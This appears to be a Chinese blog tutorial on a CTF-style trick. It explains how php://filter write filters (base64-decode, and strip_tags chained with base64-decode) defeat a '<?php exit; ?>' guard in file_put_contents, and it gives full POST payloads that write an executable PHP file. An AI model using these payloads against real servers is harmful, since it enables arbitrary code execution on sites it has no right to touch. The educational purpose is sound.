当前位置: 首页 > news >正文

北京旅游型网站建设黄冈网站推广软件

北京旅游型网站建设,黄冈网站推广软件,软件开发有哪些,跨境电商网站建设方案目录 代码 如何绕过 payload构造 代码 <?php $content <?php exit; ?>; $content . $_POST[txt]; file_put_contents($_POST[filename],$content); 当你想要输入代码的时候前面会有<?php exit;?>;&#xff0c;代码没有办法执行下去&#xff0c;所以…

目录

代码

如何绕过

payload构造


代码

<?php
$content = '<?php exit; ?>';
$content .= $_POST['txt'];
file_put_contents($_POST['filename'],$content); 

当你想要输入代码的时候前面会有<?php exit;?>;,代码没有办法执行下去,所以我们要想办法绕过

如何绕过

我们可以尝试使用php://filter/write=convert.base64-decode/resource=abc.php,在写入文件的时候对文件进行解码,然后我们后面POST传参的时候可以传一个base64编码,然后php://file解码的时候会将前面的<?php exit;?>解码成别的字符,然后将你输入的base64编码解码成原来的字符

<?php phpinfo();的编码

PD9waHAgcGhwaW5mbygpOw==

抓包提交参数,所提交的txt前面需要加一个a,这个的原因是base是4位一解码,txt前面加a是用来给<?php exit; ?>补位的

payload构造

txt=aPD9waHAgcGhwaW5mbygpOw==
filename=php://filter/write=convert.base64-decode/resource=abc.php

看一下我们的文件路径,多出一个abc.php文件且前面的<?php exit; ?>被编码成乱码了,然后后面的php代码就可以执行了

php://filter还有别的标签string.strip_tags,这个标签可以从字符串中去除 HTML 和 PHP 标记。

然后我们可以传一个base64的编码然后先去除,<?php exit; ?>标签然后再解码,php://filter可以使用多个过滤器

如下,这里txt前面就没有了a

txt=PD9waHAgcGhwaW5mbygpOw==
filename=php://filter/write=string.strip_tags|convert.base64-decode/resource=abc.php

结果 

http://www.shuangfujiaoyu.com/news/55940.html

相关文章:

  • 公司做网站是管理费用福州seo技术培训
  • 网站外链的建设企业网络营销方案策划
  • 东莞企业网站建设软文营销是什么意思
  • 手机网站制作app搜索引擎都有哪些
  • python 做网站 代码会个人网站的制作模板
  • 店铺网站怎么建精准引流推广公司
  • php 网站源代码百度收录的网站多久更新一次
  • 有什么网站可以做免费推广企业宣传片
  • 东莞疫情最新情况最新消息网站关键词优化推广哪家快
  • 软件测试项目去哪里找seo策略分析
  • 淘宝联盟怎么做自己的网站地推接单正规平台
  • 计算机专业做网站的总结抖音seo源码搭建
  • 国外做网站推广班级优化大师使用心得
  • 合同范本的网站西宁网站seo
  • 深圳Wordpress网站下列关于seo优化说法不正确的是
  • 网站开发语言 asp可靠的网站优化
  • 洛阳建设部官方网站口碑营销的优势有哪些
  • 朝阳区手机网站建设服务我的百度购物订单
  • 可以做外链的网站网络营销的十种方法
  • 自己做的网站某个网页打开很慢高清免费观看电视网站
  • 优惠网站代理怎么做中国万网登录入口
  • 佛山h5网站公司网络营销的手段包括
  • 抖音评论点赞自助网站百度网站排名规则
  • 中山网站建设企业广告推广怎么找客户
  • 哪个网站做的效果图好百度人工客服在线咨询电话
  • 培训做网站搜索广告和信息流广告区别
  • 手机版网站模板如何做品牌运营与推广
  • 网站建设与制作的毕业论文百度seo流量
  • 旅游网站推荐免费网站制作成品
  • 网站商城支付接口营销策划书模板范文